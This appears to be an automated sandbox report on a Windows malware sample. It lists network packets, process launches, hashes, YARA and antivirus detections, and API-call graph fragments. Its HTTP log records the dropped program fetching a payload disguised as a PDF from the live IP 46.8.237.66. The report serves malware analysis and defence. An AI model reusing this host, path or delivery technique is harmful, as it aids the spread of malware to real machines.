                              Oct 30, 2024 20:19:05.468733072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468789101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468803883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468841076 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469029903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469042063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469048977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469059944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469075918 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469113111 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469163895 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469249010 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469295025 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469362974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469372988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469383001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469393969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469408989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469434023 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469651937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469665051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469675064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469706059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469814062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469825029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469835043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469861031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469897032 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470084906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470096111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470105886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470125914 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470134974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470135927 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470174074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470402002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470412970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470422983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470443964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470479965 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470592022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470602989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470613956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470664024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470865011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470875025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470885038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470896006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470906973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470912933 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470916986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470926046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470941067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470969915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512574911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512645006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512655020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512728930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512761116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512773037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512784004 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512816906 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512835979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512888908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512972116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513015985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.513037920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513087988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513128042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.554975033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.554995060 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.555005074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.555170059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588232994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588282108 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588306904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588318110 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588366032 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588484049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588495016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588504076 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588571072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588773012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588793993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588804007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588814974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588825941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588828087 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588840008 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588854074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588890076 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589292049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589303970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589344978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589781046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589791059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589799881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589809895 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589821100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589831114 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.589833975 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589858055 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.589884043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590280056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590291023 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590301037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590311050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590321064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590327978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590332031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590342999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590353012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590358019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590365887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590375900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.590380907 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.590401888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591048956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591058016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591068029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591078043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591088057 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591097116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591104031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591115952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591125965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591137886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591149092 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591150045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591173887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591747046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591757059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591767073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591777086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591787100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.591797113 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.591837883 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632190943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632241011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632249117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632294893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632407904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632419109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632452965 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632469893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632514954 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.632730961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632834911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632844925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.632883072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674762011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674814939 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674850941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674861908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.674895048 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.674998999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.675010920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.675054073 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.707860947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.707945108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.707957029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708009958 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708112001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708122015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708131075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708169937 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708197117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708247900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708796024 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708810091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708818913 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708828926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.708848000 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.708889961 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709153891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709162951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709204912 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709325075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709342003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709352970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709362984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709369898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709372997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709383965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709394932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709403038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.709413052 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.709453106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710124969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710135937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710145950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710155964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710166931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710174084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710226059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710417986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710428953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710441113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710452080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710463047 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710478067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710524082 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710760117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710771084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710776091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710784912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710794926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710812092 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710813999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710822105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710832119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710841894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710845947 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710851908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.710875034 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.710900068 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711416960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711427927 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711436987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711448908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711460114 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711461067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711472988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711483955 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711492062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.711498976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.711529016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.751854897 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.751943111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.751945019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.751955986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752010107 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752039909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752051115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752060890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752067089 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752099037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752121925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752228975 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752239943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752249002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752283096 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.752360106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752370119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.752415895 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794159889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794203997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794214964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794250011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794296026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794325113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794337034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.794374943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.794465065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827409983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827449083 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827461004 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827466011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827547073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827584982 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827630997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827641964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827682972 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827800035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827810049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827819109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.827850103 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.827898026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828147888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828155994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828201056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828277111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828288078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828299046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828310966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828322887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828322887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828366041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828530073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828541040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828556061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828566074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828579903 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828633070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.828774929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828784943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.828824997 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.829047918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829058886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829070091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829081059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.829091072 CET804970946.8.237.66192.168.2.6
                              • 46.8.237.66
                              Session ID:0
                              Source IP:192.168.2.6
                              Source Port:49709
                              Destination IP:46.8.237.66
                              Destination Port:80
                              PID:6752
                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe

                              Timestamp:Oct 30, 2024 20:19:00.759234905 CET
                              Bytes transferred:80
                              Direction:OUT
                              Data:
                              GET /spool01/Rhxkjsv.pdf HTTP/1.1
                              Host: 46.8.237.66
                              Connection: Keep-Alive

                              Timestamp:Oct 30, 2024 20:19:01.629309893 CET
                              Bytes transferred:1236
                              Direction:IN
                              Data:
                              HTTP/1.1 200 OK
                              Date: Wed, 30 Oct 2024 19:19:01 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Last-Modified: Fri, 25 Oct 2024 15:28:31 GMT
                              ETag: "14dc08-6254ec57945c0"
                              Accept-Ranges: bytes
                              Content-Length: 1367048
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/pdf



                              Target ID:0
                              Start time:15:18:59
                              Start date:30/10/2024
                              Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe"
                              Imagebase:0x7ff71d1d0000
                              File size:194'048 bytes
                              MD5 hash:485927FE0C19012F31F1EF565254B374
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:15:18:59
                              Start date:30/10/2024
                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              Imagebase:0xfb0000
                              File size:57'568 bytes
                              MD5 hash:D9021E407CD5133BA842A9F6F21B606B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 29%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:15:19:09
                              Start date:30/10/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                              Imagebase:0x7ff713720000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:15:19:41
                              Start date:30/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0x5d0000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:9
                              Start time:15:19:42
                              Start date:30/10/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172
                              Imagebase:0xe10000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true


                                Execution Graph

                                Execution Coverage:28%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:42.1%
                                Total number of Nodes:927
                                Total number of Limit Nodes:45
LocalAlloc 2347->2348 2348->2346 2349 7ff71d1d13d2 GetTokenInformation 2348->2349 2350 7ff71d1d1491 LocalFree 2349->2350 2351 7ff71d1d13fc AllocateAndInitializeSid 2349->2351 2350->2346 2351->2350 2354 7ff71d1d1445 2351->2354 2352 7ff71d1d1481 FreeSid 2352->2350 2353 7ff71d1d1452 EqualSid 2353->2354 2355 7ff71d1d1476 2353->2355 2354->2352 2354->2353 2354->2355 2355->2352 2357 7ff71d1d7b63 2356->2357 2358 7ff71d1d7b03 LoadResource 2356->2358 2360 7ff71d1d4dcc 24 API calls 2357->2360 2358->2357 2359 7ff71d1d7b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2362 7ff71d1d7b87 2359->2362 2361 7ff71d1d7b82 2360->2361 2361->2362 2362->2158 2365 7ff71d1d7dd9 2364->2365 2367 7ff71d1d7d88 2364->2367 2365->2278 2366 7ff71d1d7d90 IsDBCSLeadByte 2366->2367 2367->2366 2368 7ff71d1d7db6 CharNextA 2367->2368 2368->2365 2368->2367 2370 7ff71d1d7bc8 2369->2370 2370->2370 2371 7ff71d1d7bda 2370->2371 2372 7ff71d1d7bec CharPrevA 2370->2372 2371->2297 2372->2371 2374 7ff71d1d8685 RtlVirtualUnwind 2373->2374 2375 7ff71d1d86c7 2373->2375 2374->2375 2378 7ff71d1d8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff71d1d2a2f 